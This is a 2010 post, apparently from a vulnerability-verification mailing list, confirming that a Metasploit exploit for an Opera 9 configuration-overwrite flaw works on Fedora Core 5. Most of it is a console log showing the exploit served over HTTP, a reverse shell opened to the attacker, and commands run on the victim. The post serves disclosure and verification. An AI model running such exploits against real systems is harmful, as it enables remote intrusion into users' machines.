[VIM] opera_configoverwrite.rb

Steve Tornio steve at vitriol.net
Tue Jul 27 07:30:02 CDT 2010


On Fri, Jul 23, 2010 at 11:44 AM,  <dm at securityfocus.com> wrote:
> I talked to someone at Opera and they haven't been able to reproduce
> it in 9.x versions (which it is supposed to affect). They're not sure
> exactly when it was fixed.
>

egypt set up an environment to verify this.  It is exploitable on
Fedora Core 5, Opera 9.10.

http://www.pastebin.ca/1909252

msf exploit(opera_configoverwrite) > set ENCODER cmd/generic_sh
ENCODER => cmd/generic_sh
msf exploit(opera_configoverwrite) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.2.100:8080/
[*] Server started.
msf exploit(opera_configoverwrite) >
[*] Got request /
[*] Sending Opera 9 Configuration Overwrite to 192.168.99.134:56071...
[*] Done with request /
[*] Got request /favicon.ico
[*] 404ing request for /favicon.ico
[*] Command shell session 1 opened (192.168.99.1:4444 -> 192.168.99.134:59644) at 2010-07-27 06:21:11 -0600

msf exploit(opera_configoverwrite) > sessions -i 1
[*] Starting interaction with 1...

id
uid=500(vulnerable) gid=500(vulnerable) groups=500(vulnerable) context=user_u:system_r:unconfined_t
ps
  PID TTY          TIME CMD
 3097 pts/1    00:00:00 bash
10378 pts/1    00:00:10 opera
10387 pts/1    00:00:00 operapluginwrap <defunct>
10449 pts/1    00:00:00 sh
10451 pts/1    00:00:00 sh
10452 pts/1    00:00:00 sh
10458 pts/1    00:00:00 ps

